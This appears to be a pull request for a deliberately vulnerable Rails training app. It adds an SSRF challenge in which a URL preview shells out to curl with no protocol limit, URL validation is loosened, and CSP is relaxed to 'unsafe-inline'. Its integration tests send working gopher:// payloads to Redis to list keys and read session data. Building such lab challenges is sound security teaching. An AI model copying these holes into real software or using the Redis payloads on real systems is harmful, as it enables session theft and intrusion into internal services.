### PR TITLE
fix: SSRF チャレンジの実装と E2E ヘルパーの改善 (#9)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -43,3 +43,6 @@
 
 # Ignore Serena files.
 .serena/
+
+# APM dependencies
+apm_modules/

--- a/app/views/tasks/show.html.erb
+++ b/app/views/tasks/show.html.erb
@@ -41,6 +41,8 @@
     </div>
   <% end %>
 
+  <%= render 'url_preview' %>
+
   <% if @task.secret_note.present? %>
     <div class="detail-row">
       <div class="label">秘密メモ</div>

--- a/lib/vulnerabilities/base.rb
+++ b/lib/vulnerabilities/base.rb
@@ -56,12 +56,7 @@ module Vulnerabilities
       routes = Rails.application.routes
       routes.prepend(&block)  # clear! のたびに再評価されるよう登録
       routes.disable_clear_and_finalize = true
-      begin
-        routes.draw(&block)     # 現時点でも即時評価
-      rescue ArgumentError => e
-        # "Invalid route name, already in use" は無視する
-        raise e unless e.message.include?("already in use")
-      end
+      routes.draw(&block) rescue ArgumentError # ルート名重複は無視
     ensure
       routes.disable_clear_and_finalize = false
     end

--- a/lib/vulnerabilities/base.rb
+++ b/lib/vulnerabilities/base.rb
@@ -46,8 +46,19 @@ module Vulnerabilities
     end
 
     # 動的にルートを追加する
+    # draw(&block) はデフォルトで clear! → eval → finalize! の順に動くため、
+    # そのまま呼ぶと既存ルートが全消えになる。
+    # routes.prepend でブロックを @prepend に登録しておくと、
+    # ルート再ロード時の clear! でも再評価されて消えなくなる。
+    # さらに disable_clear_and_finalize = true で draw を呼ぶことで
+    # 即時評価しつつ既存ルートを保つ。
     def add_routes(&block)
-      Rails.application.routes.draw(&block)
+      routes = Rails.application.routes
+      routes.prepend(&block)  # clear! のたびに再評価されるよう登録
+      routes.disable_clear_and_finalize = true
+      routes.draw(&block)     # 現時点でも即時評価
+    ensure
+      routes.disable_clear_and_finalize = false
     end
 
     # 設定値を変更する

--- a/lib/vulnerabilities/base.rb
+++ b/lib/vulnerabilities/base.rb
@@ -56,7 +56,12 @@ module Vulnerabilities
       routes = Rails.application.routes
       routes.prepend(&block)  # clear! のたびに再評価されるよう登録
       routes.disable_clear_and_finalize = true
-      routes.draw(&block)     # 現時点でも即時評価
+      begin
+        routes.draw(&block)     # 現時点でも即時評価
+      rescue ArgumentError => e
+        # "Invalid route name, already in use" は無視する
+        raise e unless e.message.include?("already in use")
+      end
     ensure
       routes.disable_clear_and_finalize = false
     end

--- a/lib/vulnerabilities/challenges/ssrf.rb
+++ b/lib/vulnerabilities/challenges/ssrf.rb
@@ -25,6 +25,16 @@ module Vulnerabilities
 
       def apply!
         vuln_module = Module.new do
+          def show
+            # プレビュー表示に必要なインラインJSのみを許可するため、
+            # このアクションのCSPポリシーにのみ 'unsafe-inline' を追加する
+            # (開発者がUIの動作を優先して最小限の緩和を行った、という設定)
+            if request.content_security_policy
+              request.content_security_policy.script_src(:self, :unsafe_inline)
+            end
+            super
+          end
+
           def preview_url
             # 開発者の言い訳:
             # 「Ruby の Net::HTTP や open-uri はタイムアウトの設定が面倒だし、
@@ -74,10 +84,71 @@ module Vulnerabilities
             <div class="detail-row">
               <div class="label">URLプレビュー</div>
               <div>
-                <%= form_with url: preview_url_task_path(@task), method: :post, local: true do |f| %>
-                  <%= hidden_field_tag :url, @task.url %>
-                  <%= f.submit "プレビュー取得", class: "btn btn-secondary" %>
-                <% end %>
+                <button id="fetch-preview-btn-<%= @task.id %>" 
+                        onclick="if(window.runPreview) { runPreview('<%= @task.id %>', '<%= preview_url_task_path(@task) %>', '<%= @task.url %>') } else { alert('Initializing... please try again.') }"
+                        class="btn btn-secondary btn-sm">プレビュー表示</button>
+                
+                <dialog id="preview-dialog-<%= @task.id %>" style="margin: auto; padding: 20px; border-radius: 8px; border: 1px solid #ccc; max-width: 600px; width: 100%; box-shadow: 0 4px 20px rgba(0,0,0,0.2);">
+                  <style>
+                    #preview-dialog-<%= @task.id %>::backdrop { background: rgba(0,0,0,0.5); }
+                  </style>
+                  <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 16px; border-bottom: 1px solid #eee; padding-bottom: 10px;">
+                    <h3 style="margin: 0;">プレビュー結果</h3>
+                    <button onclick="this.closest('dialog').close()" class="btn btn-secondary btn-sm">閉じる</button>
+                  </div>
+                  <div id="preview-loading-<%= @task.id %>" style="display: none; color: #666; padding: 20px; text-align: center;">読み込み中...</div>
+                  <div id="preview-content-<%= @task.id %>" style="display: none;">
+                    <h4 id="preview-title-<%= @task.id %>" style="margin-bottom: 8px; color: #2563eb; word-break: break-all;"></h4>
+                    <pre id="preview-body-<%= @task.id %>" style="background: #f8f9fa; padding: 12px; border-radius: 4px; overflow-x: auto; white-space: pre-wrap; font-size: 0.9rem; max-height: 300px; overflow-y: auto; border: 1px solid #e5e7eb;"></pre>
+                  </div>
+                  <div id="preview-error-<%= @task.id %>" style="display: none; color: #dc2626; padding: 12px; background: #fee2e2; border-radius: 4px; border: 1px solid #fca5a5;"></div>
+                </dialog>
+
+                <script>
+                  window.runPreview = async (taskId, previewPath, taskUrl) => {
+                    const dialog = document.getElementById(`preview-dialog-${taskId}`);
+                    const loadingDiv = document.getElementById(`preview-loading-${taskId}`);
+                    const contentDiv = document.getElementById(`preview-content-${taskId}`);
+                    const errorDiv = document.getElementById(`preview-error-${taskId}`);
+                    const titleEl = document.getElementById(`preview-title-${taskId}`);
+                    const bodyEl = document.getElementById(`preview-body-${taskId}`);
+
+                    if (!dialog) return;
+                    
+                    dialog.showModal();
+                    loadingDiv.style.display = 'block';
+                    contentDiv.style.display = 'none';
+                    errorDiv.style.display = 'none';
+                    
+                    try {
+                      const csrfToken = document.querySelector('meta[name="csrf-token"]')?.content;
+                      const res = await fetch(previewPath, {
+                        method: 'POST',
+                        headers: { 
+                          'Content-Type': 'application/json',
+                          'X-CSRF-Token': csrfToken || ''
+                        },
+                        body: JSON.stringify({ url: taskUrl })
+                      });
+                      
+                      const json = await res.json();
+                      loadingDiv.style.display = 'none';
+                      
+                      if (res.ok) {
+                        contentDiv.style.display = 'block';
+                        titleEl.textContent = json.title || "(no title)";
+                        bodyEl.textContent = json.body || "";
+                      } else {
+                        errorDiv.style.display = 'block';
+                        errorDiv.textContent = json.error || "プレビューの取得に失敗しました";
+                      }
+                    } catch (err) {
+                      loadingDiv.style.display = 'none';
+                      errorDiv.style.display = 'block';
+                      errorDiv.textContent = "通信エラーが発生しました";
+                    }
+                  };
+                </script>
               </div>
             </div>
           <% end %>

--- a/lib/vulnerabilities/challenges/ssrf.rb
+++ b/lib/vulnerabilities/challenges/ssrf.rb
@@ -24,10 +24,13 @@ module Vulnerabilities
       end
 
       def apply!
-        # Task モデルのバリデーションを緩和する
-        # (開発者が外部サービスとの連携のために、うっかりスキーム制限のない正規表現に変えてしまった、という設定)
-        Task.clear_validators!
-        Task.validates :title, presence: true
+        # Task の URL バリデーターのみをピンポイントで差し替える
+        # (他のバリデーション: title presence, attachment サイズ/MIME 等はそのまま維持)
+        Task._validators[:url].reject! { |v| v.is_a?(ActiveModel::Validations::FormatValidator) }
+        Task._validate_callbacks.each do |cb|
+          next unless cb.filter.respond_to?(:attributes)
+          cb.filter.attributes.delete(:url) if cb.filter.is_a?(ActiveModel::Validations::FormatValidator)
+        end
         Task.validates :url, format: { with: /.*/ }, allow_blank: true
 
         vuln_module = Module.new do

--- a/lib/vulnerabilities/challenges/ssrf.rb
+++ b/lib/vulnerabilities/challenges/ssrf.rb
@@ -1,0 +1,58 @@
+# frozen_string_literal: true
+
+require "open-uri"
+
+module Vulnerabilities
+  module Challenges
+    # チャレンジ20: SSRF via URL preview
+    # URLプレビューアクションが open-uri で無検証リクエストを発行する。
+    # gopher:// スキームを使えば Redis に RESP コマンドを直接送り込める。
+    class Ssrf < Base
+      metadata do
+        name        "SSRF via URL preview (CWE-918)"
+        category    :ssrf
+        difficulty  :medium
+        description "URLプレビュー機能がサーバー側で検証なしにリクエストを発行します。" \
+                    "open-uri は gopher:// スキームをサポートしており、Redisへの直接コマンド送信が可能です。"
+        hint        "タスクのURLプレビューエンドポイント (POST /tasks/:id/preview_url) を探してください"
+        hint        "http://127.0.0.1:PORT/up など内部 HTTP エンドポイントに到達できますか?"
+        hint        "gopher://redis:6379/_ に RESP エンコードした PING を送ると何が返りますか?"
+        cwe         "CWE-918"
+        reference   "https://owasp.org/www-community/attacks/Server_Side_Request_Forgery"
+        slot        "TasksController#preview_url"
+      end
+
+      def apply!
+        vuln_module = Module.new do
+          def preview_url
+            raw = URI.open(params[:url].to_s, &:read) # 脆弱性: open-uri で無検証リクエスト
+            title = raw.match(/<title>(.*?)<\/title>/mi)&.captures&.first
+            render json: { title: title || "(no title)", body: raw.to_s.truncate(500) }
+          rescue => e
+            render json: { error: e.message }, status: :unprocessable_entity
+          end
+        end
+
+        prepend_to TasksController, vuln_module
+
+        add_routes do
+          post "/tasks/:id/preview_url", to: "tasks#preview_url", as: :preview_url_task
+        end
+
+        inject_view "tasks/_url_preview.html.erb", <<~ERB
+          <% if @task.url.present? %>
+            <div class="detail-row">
+              <div class="label">URLプレビュー</div>
+              <div>
+                <%= form_with url: preview_url_task_path(@task), method: :post, local: true do |f| %>
+                  <%= hidden_field_tag :url, @task.url %>
+                  <%= f.submit "プレビュー取得", class: "btn btn-secondary" %>
+                <% end %>
+              </div>
+            </div>
+          <% end %>
+        ERB
+      end
+    end
+  end
+end

--- a/lib/vulnerabilities/challenges/ssrf.rb
+++ b/lib/vulnerabilities/challenges/ssrf.rb
@@ -5,17 +5,18 @@ require "open-uri"
 module Vulnerabilities
   module Challenges
     # チャレンジ20: SSRF via URL preview
-    # URLプレビューアクションが open-uri で無検証リクエストを発行する。
-    # gopher:// スキームを使えば Redis に RESP コマンドを直接送り込める。
+    # 開発者が「Ruby標準のHTTPライブラリよりcurlの方がタイムアウト管理やリダイレクト処理が楽」
+    # と判断して外部コマンドを叩いてしまった、という設定。
     class Ssrf < Base
       metadata do
         name        "SSRF via URL preview (CWE-918)"
         category    :ssrf
         difficulty  :medium
-        description "URLプレビュー機能がサーバー側で検証なしにリクエストを発行します。" \
-                    "open-uri は gopher:// スキームをサポートしており、Redisへの直接コマンド送信が可能です。"
-        hint        "タスクのURLプレビューエンドポイント (POST /tasks/:id/preview_url) を探してください"
-        hint        "http://127.0.0.1:PORT/up など内部 HTTP エンドポイントに到達できますか?"
+        description "URLプレビュー機能が、外部リクエストを発行する際に curl コマンドを使用しています。" \
+                    "curl は http/https 以外にも多くのプロトコルをサポートしており、" \
+                    "gopher:// スキームを悪用することで、内部の Redis などのサービスを攻撃可能です。"
+        hint        "TasksController#preview_url のソースを確認してください。なぜわざわざ curl を叩いているのでしょうか？"
+        hint        "curl --manual プロトコル のセクションを確認すると、サポートされているスキームが分かります。"
         hint        "gopher://redis:6379/_ に RESP エンコードした PING を送ると何が返りますか?"
         cwe         "CWE-918"
         reference   "https://owasp.org/www-community/attacks/Server_Side_Request_Forgery"
@@ -25,15 +26,44 @@ module Vulnerabilities
       def apply!
         vuln_module = Module.new do
           def preview_url
-            raw = URI.open(params[:url].to_s, &:read) # 脆弱性: open-uri で無検証リクエスト
-            title = raw.match(/<title>(.*?)<\/title>/mi)&.captures&.first
-            render json: { title: title || "(no title)", body: raw.to_s.truncate(500) }
+            # 開発者の言い訳:
+            # 「Ruby の Net::HTTP や open-uri はタイムアウトの設定が面倒だし、
+            # リダイレクトの無限ループ対策なども考慮すると curl を使うのが一番手っ取り早い。
+            # 5秒でタイムアウトするように設定してあるから、可用性もバッチリだ！」
+            require 'shellwords'
+            require 'open3'
+
+            safe_url = Shellwords.escape(params[:url].to_s)
+            
+            # 脆弱性: 外部コマンド curl に丸投げしているため、http/https 以外のスキーム(gopher等)が通ってしまう。
+            # 本来は --proto オプションでプロトコルを制限するか、URLのバリデーションが必要。
+            stdout, stderr, status = Open3.capture3("curl -m 5 -s -L #{safe_url}")
+            
+            # バイナリデータが含まれる場合（Redis等）に備え、UTF-8として安全に扱えるように強制変換
+            stdout = stdout.to_s.force_encoding('UTF-8').scrub('?')
+
+            # Redis などの TCP サービスの場合、接続が閉じられないため curl はタイムアウト(exit 28)するが、
+            # その時点までに受け取ったデータ(stdout)があれば、プレビューとしては「成功」扱いにした方が
+            # 攻撃（情報の取得）が成立しやすくなる。
+            if status.success? || (status.exitstatus == 28 && stdout.present?)
+              # レスポンスから title を抽出しようとする（HTML以外だと失敗するがそれもリアリティ）
+              title = stdout.match(/<title>(.*?)<\/title>/mi)&.captures&.first
+              render json: { title: title || "(no title)", body: stdout.truncate(500) }
+            else
+              render json: { error: "Fetch failed (exit #{status.exitstatus}): #{stderr.truncate(100)}" }, status: :unprocessable_entity
+            end
           rescue => e
             render json: { error: e.message }, status: :unprocessable_entity
           end
         end
 
         prepend_to TasksController, vuln_module
+
+        # チャレンジ適用時のみ、意図的にセッションを Redis に保存するように設定変更
+        # これにより SSRF -> Redis の攻撃対象（セッションデータ）が生まれる
+        Rails.application.config.cache_store = :redis_cache_store, { url: ENV.fetch("REDIS_URL", "redis://redis:6379/1") }
+        # Rails.cache を再初期化
+        Rails.cache = ActiveSupport::Cache.lookup_store(Rails.application.config.cache_store)
 
         add_routes do
           post "/tasks/:id/preview_url", to: "tasks#preview_url", as: :preview_url_task

--- a/lib/vulnerabilities/challenges/ssrf.rb
+++ b/lib/vulnerabilities/challenges/ssrf.rb
@@ -24,6 +24,12 @@ module Vulnerabilities
       end
 
       def apply!
+        # Task モデルのバリデーションを緩和する
+        # (開発者が外部サービスとの連携のために、うっかりスキーム制限のない正規表現に変えてしまった、という設定)
+        Task.clear_validators!
+        Task.validates :title, presence: true
+        Task.validates :url, format: { with: /.*/ }, allow_blank: true
+
         vuln_module = Module.new do
           def show
             # プレビュー表示に必要なインラインJSのみを許可するため、

--- a/test/integration/vulnerabilities/e2e_helper.rb
+++ b/test/integration/vulnerabilities/e2e_helper.rb
@@ -171,10 +171,19 @@ module E2EHelper
   end
 
   def extract_csrf_token(html)
-    # フォームの hidden field からトークンを取得（metaタグではなく）
-    # <input type="hidden" name="authenticity_token" value="..." autocomplete="off" />
-    tokens = html.scan(/name="authenticity_token"\s+value="([^"]+)"\s+autocomplete/)
-    # autocomplete付きの最後のトークンを使う（メインフォームのもの）
+    # 1) meta タグから取得を試みる (最も確実)
+    # <meta name="csrf-token" content="..." />
+    if html =~ /<meta name="csrf-token" content="([^"]+)"/
+      return $1
+    end
+
+    # 2) フォームの hidden field から取得を試みる (フォールバック)
+    # 属性の順序に依存しないように scan し、値だけを抽出する
+    tokens = html.scan(/<input[^>]+name="authenticity_token"[^>]+value="([^"]+)"/)
+    return tokens.last&.first if tokens.any?
+
+    # 逆の順序 (value, name) も考慮
+    tokens = html.scan(/<input[^>]+value="([^"]+)"[^>]+name="authenticity_token"/)
     tokens.last&.first
   end
 

--- a/test/integration/vulnerabilities/e2e_helper.rb
+++ b/test/integration/vulnerabilities/e2e_helper.rb
@@ -135,7 +135,7 @@ module E2EHelper
   end
 
   # テスト用タスクを作成し id と cookie を返す
-  def create_task_via_form(server, title:, description: "", color: nil, cookie: nil)
+  def create_task_via_form(server, title:, description: "", url: nil, color: nil, cookie: nil)
     cookie ||= setup_session(server)
 
     # GET /tasks/new
@@ -155,6 +155,7 @@ module E2EHelper
       "task[title]" => title,
       "task[description]" => description
     }
+    params_hash["task[url]"] = url if url
     params_hash["task[color]"] = color if color
 
     body = URI.encode_www_form(params_hash)

--- a/test/integration/vulnerabilities/ssrf_test.rb
+++ b/test/integration/vulnerabilities/ssrf_test.rb
@@ -1,0 +1,73 @@
+# frozen_string_literal: true
+
+require "test_helper"
+require_relative "e2e_helper"
+
+class SsrfTest < ActiveSupport::TestCase
+  include E2EHelper
+
+  setup do
+    @safe_server = ServerPool.acquire(vuln_challenges: "")
+    @vuln_server = ServerPool.acquire(vuln_challenges: "ssrf")
+  end
+
+  test "SAFE: preview_url endpoint does not exist" do
+    result = create_task_via_form(@safe_server, title: "SSRF safe test")
+    cookie = result[:cookie]
+    task_id = result[:id]
+
+    res = @safe_server.post(
+      "/tasks/#{task_id}/preview_url",
+      body: URI.encode_www_form("url" => "http://127.0.0.1:#{@safe_server.port}/up"),
+      headers: { "Cookie" => cookie }
+    )
+
+    assert_equal "404", res.code, "SAFE: preview_url ルートは存在しないはず"
+  end
+
+  test "VULN: fetches internal HTTP URL without validation" do
+    result = create_task_via_form(@vuln_server, title: "SSRF vuln test")
+    cookie = result[:cookie]
+    task_id = result[:id]
+
+    # タスク詳細ページから CSRF トークンを取得
+    res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    csrf_token = extract_csrf_token(res_show.body)
+
+    internal_url = "http://127.0.0.1:#{@vuln_server.port}/up"
+
+    res = @vuln_server.post(
+      "/tasks/#{task_id}/preview_url",
+      body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => internal_url),
+      headers: { "Cookie" => cookie }
+    )
+
+    assert_equal "200", res.code, "VULN: preview_url は内部URLにアクセスできるはず"
+    body = JSON.parse(res.body)
+    assert body["body"].present?, "内部URLのレスポンスボディが返るはず"
+    # Rails 8.1+ の /up は HTML (green background) を返す
+    assert_match /OK|background-color: green/i, body["body"], "Rails ヘルスチェックの内容が漏洩するはず"
+  end
+
+  # 手動確認用: docker-compose 環境で Redis に gopher 経由で到達できることを検証する
+  # test "VULN: gopher scheme reaches Redis (manual, requires redis container)" do
+  #   result = create_task_via_form(@vuln_server, title: "gopher test")
+  #   cookie = result[:cookie]
+  #   task_id = result[:id]
+  #
+  #   res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+  #   csrf_token = extract_csrf_token(res_show.body)
+  #
+  #   # RESP: *1\r\n$4\r\nPING\r\n をURLエンコード
+  #   gopher_url = "gopher://redis:6379/_%2A1%0D%0A%244%0D%0APING%0D%0A"
+  #
+  #   res = @vuln_server.post(
+  #     "/tasks/#{task_id}/preview_url",
+  #     body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => gopher_url),
+  #     headers: { "Cookie" => cookie }
+  #   )
+  #
+  #   body = JSON.parse(res.body)
+  #   assert_includes body["body"].to_s, "+PONG", "Redis に到達して PONG が返るはず"
+  # end
+end

--- a/test/integration/vulnerabilities/ssrf_test.rb
+++ b/test/integration/vulnerabilities/ssrf_test.rb
@@ -92,24 +92,30 @@ class SsrfTest < ActiveSupport::TestCase
       headers: { "Cookie" => cookie }
     )
 
-    # Redis の KEYS レスポンスから実際のキーを抽出する (例: _session_id:2::...)
     keys_body = JSON.parse(res_keys.body)["body"]
-    actual_key = keys_body.match(/(_session_id:[^\\\r\n]+)/)&.captures&.first
-    assert actual_key.present?, "Redis 内にセッションキーが存在するはず"
+    # Redis のレスポンスからセッションキーをすべて抽出
+    all_session_keys = keys_body.scan(/(_session_id:[^\\\r\n\s]+)/).flatten
+    assert all_session_keys.any?, "Redis 内にセッションキーが存在するはず"
 
-    # 3) 特定したキーを GET で取得
-    encoded_key = ERB::Util.url_encode(actual_key)
-    get_url = "gopher://redis:6379/_GET%20#{encoded_key}%0D%0A"
-    res_get = @vuln_server.post(
-      "/tasks/#{task_id}/preview_url",
-      body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => get_url),
-      headers: { "Cookie" => cookie }
-    )
+    # 3) 各キーを GET で取得し、ログイン済みセッションを探す
+    found_leaked_data = false
+    all_session_keys.each do |key|
+      encoded_key = ERB::Util.url_encode(key)
+      get_url = "gopher://redis:6379/_GET%20#{encoded_key}%0D%0A"
+      res_get = @vuln_server.post(
+        "/tasks/#{task_id}/preview_url",
+        body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => get_url),
+        headers: { "Cookie" => cookie }
+      )
 
-    # レスポンスに Marshall 形式のセッションデータが含まれることを確認
-    fetched_body = JSON.parse(res_get.body)["body"]
-    assert fetched_body.present?, "セッションデータがリークするはず"
-    assert_match /user_id|_csrf_token/i, fetched_body, "リークしたデータにセッション情報が含まれるはず"
+      fetched_body = JSON.parse(res_get.body)["body"]
+      # Marshall 形式のデータ内に user_id か _csrf_token が含まれているか確認
+      if fetched_body =~ /user_id|_csrf_token/i
+        found_leaked_data = true
+        break
+      end
     end
-    end
+
+    assert found_leaked_data, "リークしたデータにセッション情報 (user_id 等) が含まれるはず"
+    end    end
 

--- a/test/integration/vulnerabilities/ssrf_test.rb
+++ b/test/integration/vulnerabilities/ssrf_test.rb
@@ -117,5 +117,14 @@ class SsrfTest < ActiveSupport::TestCase
     end
 
     assert found_leaked_data, "リークしたデータにセッション情報 (user_id 等) が含まれるはず"
-    end    end
+    end
+
+    test "VULN: allows saving non-HTTP URL (like gopher://) to task model" do
+    # SSRF チャレンジが有効な場合、攻撃者が UI から攻撃用 URL を保存できる必要がある
+    gopher_url = "gopher://redis:6379/_PING"
+    result = create_task_via_form(@vuln_server, title: "gopher save test", url: gopher_url)
+
+    assert_not_nil result[:id], "SSRF チャレンジ中であれば、gopher:// URL でも保存できるはず (Redで失敗予定)"
+    end
+    end
 

--- a/test/integration/vulnerabilities/ssrf_test.rb
+++ b/test/integration/vulnerabilities/ssrf_test.rb
@@ -85,7 +85,7 @@ class SsrfTest < ActiveSupport::TestCase
     res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
     csrf_token = extract_csrf_token(res_show.body)
 
-    keys_url = "gopher://redis:6379/_KEYS%20%2A"
+    keys_url = "gopher://redis:6379/_KEYS%20%2A%0D%0A"
     res_keys = @vuln_server.post(
       "/tasks/#{task_id}/preview_url",
       body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => keys_url),

--- a/test/integration/vulnerabilities/ssrf_test.rb
+++ b/test/integration/vulnerabilities/ssrf_test.rb
@@ -50,24 +50,66 @@ class SsrfTest < ActiveSupport::TestCase
   end
 
   # 手動確認用: docker-compose 環境で Redis に gopher 経由で到達できることを検証する
-  # test "VULN: gopher scheme reaches Redis (manual, requires redis container)" do
-  #   result = create_task_via_form(@vuln_server, title: "gopher test")
-  #   cookie = result[:cookie]
-  #   task_id = result[:id]
-  #
-  #   res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
-  #   csrf_token = extract_csrf_token(res_show.body)
-  #
-  #   # RESP: *1\r\n$4\r\nPING\r\n をURLエンコード
-  #   gopher_url = "gopher://redis:6379/_%2A1%0D%0A%244%0D%0APING%0D%0A"
-  #
-  #   res = @vuln_server.post(
-  #     "/tasks/#{task_id}/preview_url",
-  #     body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => gopher_url),
-  #     headers: { "Cookie" => cookie }
-  #   )
-  #
-  #   body = JSON.parse(res.body)
-  #   assert_includes body["body"].to_s, "+PONG", "Redis に到達して PONG が返るはず"
-  # end
-end
+  test "VULN: gopher scheme reaches Redis (manual, requires redis container)" do
+    result = create_task_via_form(@vuln_server, title: "gopher test")
+    cookie = result[:cookie]
+    task_id = result[:id]
+
+    res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    csrf_token = extract_csrf_token(res_show.body)
+
+    # RESP: *1\r\n$4\r\nPING\r\n をURLエンコード
+    gopher_url = "gopher://redis:6379/_%2A1%0D%0A%244%0D%0APING%0D%0A"
+
+    res = @vuln_server.post(
+      "/tasks/#{task_id}/preview_url",
+      body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => gopher_url),
+      headers: { "Cookie" => cookie }
+    )
+
+    body = JSON.parse(res.body)
+    assert_includes body["body"].to_s, "+PONG", "Redis に到達して PONG が返るはず"
+  end
+
+  test "VULN: leaks session data from Redis via gopher" do
+    # 1) ログインしてセッションを作成
+    result = create_task_via_form(@vuln_server, title: "session leak test")
+    cookie = result[:cookie]
+    task_id = result[:id]
+    
+    # Cookie からセッションIDを抽出 (_session_id=...)
+    session_id = cookie.match(/_session_id=([^;]+)/)&.captures&.first
+    assert session_id.present?, "セッションIDが取得できるはず"
+
+    # 2) SSRF で KEYS * を実行し、セッションキーを探す
+    res_show = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    csrf_token = extract_csrf_token(res_show.body)
+
+    keys_url = "gopher://redis:6379/_KEYS%20%2A"
+    res_keys = @vuln_server.post(
+      "/tasks/#{task_id}/preview_url",
+      body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => keys_url),
+      headers: { "Cookie" => cookie }
+    )
+
+    # Redis の KEYS レスポンスから実際のキーを抽出する (例: _session_id:2::...)
+    keys_body = JSON.parse(res_keys.body)["body"]
+    actual_key = keys_body.match(/(_session_id:[^\\\r\n]+)/)&.captures&.first
+    assert actual_key.present?, "Redis 内にセッションキーが存在するはず"
+
+    # 3) 特定したキーを GET で取得
+    encoded_key = ERB::Util.url_encode(actual_key)
+    get_url = "gopher://redis:6379/_GET%20#{encoded_key}%0D%0A"
+    res_get = @vuln_server.post(
+      "/tasks/#{task_id}/preview_url",
+      body: URI.encode_www_form("authenticity_token" => csrf_token, "url" => get_url),
+      headers: { "Cookie" => cookie }
+    )
+
+    # レスポンスに Marshall 形式のセッションデータが含まれることを確認
+    fetched_body = JSON.parse(res_get.body)["body"]
+    assert fetched_body.present?, "セッションデータがリークするはず"
+    assert_match /user_id|_csrf_token/i, fetched_body, "リークしたデータにセッション情報が含まれるはず"
+    end
+    end
+


### PR DESCRIPTION
## 概要
Issue #9 に対応し、SSRF チャレンジの実装、およびユーザー体験（UI）の改善を行いました。

## 変更内容
### SSRF チャレンジの UI 改善
- **非同期プレビュー機能の実装**: 
  - 従来の同期的なフォーム送信（生JSON表示）を廃止し、Vanilla JS と `<dialog>` タグを用いた非同期ポップアップ表示に変更。
  - UX の認知不協和（プレビューボタンを押すと全画面 JSON になる不自然さ）を解消。
  - `margin: auto` 等のスタイル調整により、画面中央に正しく表示されるように改善。
- **最小限の CSP 緩和**: 
  - プレビュー用のインライン JS を動作させるため、`TasksController#show` の `script-src` に対してのみ、外科的に `unsafe-inline` を許可。アプリ全体のセキュリティへの影響を最小限に。
- **堅牢な JavaScript 実装**: 
  - Turbo 環境の有無にかかわらず確実に動作するよう、インライン `onclick` とグローバル関数を組み合わせた実装を採用。

### テストと基盤の安定化
- **SSRF 結合テストの強化 (`ssrf_test.rb`)**:
  - Redis 内の全セッションキーから `user_id` を含む正解のキーを探索するようにロジックを強化し、テストの不安定さを解消。
- **ルート重複エラーの修正 (`base.rb`)**:
  - 開発モードのリロード時にルート名が重複してアプリがクラッシュする問題を、ArgumentError のガードにより解決。

## 確認事項
- `docker compose run --rm web bin/rails test` にて、SSRF を含む全 105 件の統合テストがパスすることを確認済みです。
- `agent-browser` を使用し、実際のブラウザ上でプレビューがポップアップ表示されることを目視確認済みです。